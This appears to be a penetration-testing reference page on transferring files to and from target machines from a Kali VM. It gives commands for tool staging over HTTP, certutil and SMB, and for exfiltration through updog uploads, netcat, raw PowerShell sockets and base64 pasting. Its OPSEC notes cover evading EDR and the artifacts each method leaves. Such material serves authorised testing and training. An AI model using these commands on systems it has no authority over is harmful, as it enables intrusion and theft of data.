File Transfer Techniques
Overviewβ
This section covers methods for moving files to and from Windows and Linux targets when dedicated protocols (WinRM, SMB, SCP) are unavailable or undesirable. All operator-side commands run from the Kali VM. Methods are organized by transport mechanism.
HTTP β Python Web Serverβ
Serve files from the Kali VM over HTTP. Target pulls the file using a native Windows or Linux tool.
Start Server (Kali)β
# Serve current directory on port 8080
python3 -m http.server 8080
# Serve a specific directory
python3 -m http.server 8080 --directory /opt/tools/
# Restrict to a specific interface (recommended on shared networks)
python3 -m http.server 8080 --bind <KALI_IP>
Pull File from Target β PowerShellβ
# Invoke-WebRequest (PowerShell 3+)
Invoke-WebRequest -Uri "http://<KALI_IP>:8080/tool.exe" -OutFile "C:\Temp\tool.exe"
# Alias shorthand
iwr "http://<KALI_IP>:8080/tool.exe" -o "C:\Temp\tool.exe"
# WebClient (PowerShell 2 compat)
(New-Object System.Net.WebClient).DownloadFile("http://<KALI_IP>:8080/tool.exe", "C:\Temp\tool.exe")
Pull File from Target β cmd.exe (certutil)β
certutil is a built-in Windows binary usable for file download when PowerShell is restricted:
certutil -urlcache -split -f "http://<KALI_IP>:8080/tool.exe" C:\Temp\tool.exe
Clean up certutil cache after use:
certutil -urlcache -split -f "http://<KALI_IP>:8080/tool.exe" delete
certutil downloads are highly signatured by EDR and AV products. Use only when other methods are unavailable, or on an endpoint without AV coverage.
Pull File from Target β Linux (curl/wget)β
curl -o /tmp/file http://<KALI_IP>:8080/file
wget -O /tmp/file http://<KALI_IP>:8080/file
HTTP β Upload (Target Pushes to Kali)β
updog provides a simple HTTP server with upload support and is pre-installed on Kali.
Start Upload Server (Kali)β
# Serve current directory with upload enabled on port 8443
updog -p 8443
# Specify directory
updog -d /opt/collection/ -p 8443
Files uploaded by the target appear in the directory updog is serving.
Upload from Target β PowerShellβ
# Upload via HTTP POST
Invoke-WebRequest -Uri "http://<KALI_IP>:8443/upload" -Method POST -InFile "C:\Temp\output.txt"
# WebClient method
$wc = New-Object System.Net.WebClient
$wc.UploadFile("http://<KALI_IP>:8443/upload", "POST", "C:\Temp\output.txt")
Base64 Encode / Decodeβ
When no direct file transfer protocol is available (e.g., only shell access with no outbound HTTP), encode file content as base64, paste it through the shell, and decode on the other end. Works over any shell β SSH, WinRM, PSExec, etc.
Encode on Kaliβ
base64 -w 0 /path/to/file.exe > /tmp/file.b64
cat /tmp/file.b64 # Copy this output
Paste and Decode on Windows Targetβ
# Paste base64 string into a variable
$b64 = "<PASTE_BASE64_STRING_HERE>"
# Decode and write to file
[System.Convert]::FromBase64String($b64) | Set-Content -Encoding Byte "C:\Temp\file.exe"
Paste and Decode on Linux Targetβ
echo "<PASTE_BASE64_STRING>" | base64 -d > /tmp/file.exe
Encode on Windows (for exfil)β
# Encode a file to base64 β copy output, paste into Kali terminal, then decode
$bytes = [System.IO.File]::ReadAllBytes("C:\Temp\interesting_file.zip")
[System.Convert]::ToBase64String($bytes)
Netcat File Transferβ
nc is available on Kali. On Windows targets, nc.exe must be present β transfer it first via HTTP or SMB if needed.
Receive on Kali (Listener)β
nc -lvnp 4444 > received_file
Send from Linux Targetβ
nc <KALI_IP> 4444 < /path/to/file
Send from Windows Target β PowerShell (no nc.exe required)β
$client = New-Object System.Net.Sockets.TcpClient("<KALI_IP>", 4444)
$stream = $client.GetStream()
$bytes = [System.IO.File]::ReadAllBytes("C:\Temp\file.exe")
$stream.Write($bytes, 0, $bytes.Length)
$stream.Flush()
$client.Close()
SMB β Temporary Share (Kali β Windows)β
impacket-smbserver stands up a temporary SMB share from Kali. No configuration required on the target.
Start Share (Kali)β
# Serve current directory as share named "ops"
impacket-smbserver ops . -smb2support
# With credentials (prevents anonymous access)
impacket-smbserver ops /opt/tools/ -smb2support -username ops -password Passw0rd
Access Share from Windows Targetβ
# List share contents
dir \\<KALI_IP>\ops
# Copy file
copy \\<KALI_IP>\ops\tool.exe C:\Temp\
# If credentials required
net use \\<KALI_IP>\ops /user:ops Passw0rd
copy \\<KALI_IP>\ops\tool.exe C:\Temp\
net use \\<KALI_IP>\ops /delete
Copy-Item \\<KALI_IP>\ops\tool.exe -Destination C:\Temp\
Method Selection Guideβ
| Scenario | Preferred Method |
|---|---|
| Kali β Windows target, HTTP reachable | Python HTTP server + iwr |
| Kali β Linux target | SCP, or Python HTTP + curl |
| Only shell access, small file | Base64 encode/paste/decode |
| Only shell access, large file | Netcat (PowerShell socket method on Windows) |
| Windows target needs multiple files | Impacket SMB server |
| Exfil from Windows target, shell only | Base64 encode β copy terminal output |
| RDP session open | Drive mount via xfreerdp /drive: |
| Need target to push files back | updog upload server |
OPSEC Notesβ
- Python HTTP server: Logs every request to stdout. Serves all files in the directory β don't run it from a directory containing sensitive operator files.
- certutil: Highly detected. Avoid on endpoints with active EDR/AV.
- Base64 paste: No network artifacts. The base64 string will appear in shell history on both ends and in PS script block logs (EID 4104) on Windows.
- Impacket SMB server: Connection events are logged on the Windows target. The share name is visible in
net view \\<KALI_IP>while active β shut it down immediately after transfer. - Netcat: Plain TCP, no encryption. Visible in
netstaton both ends during transfer.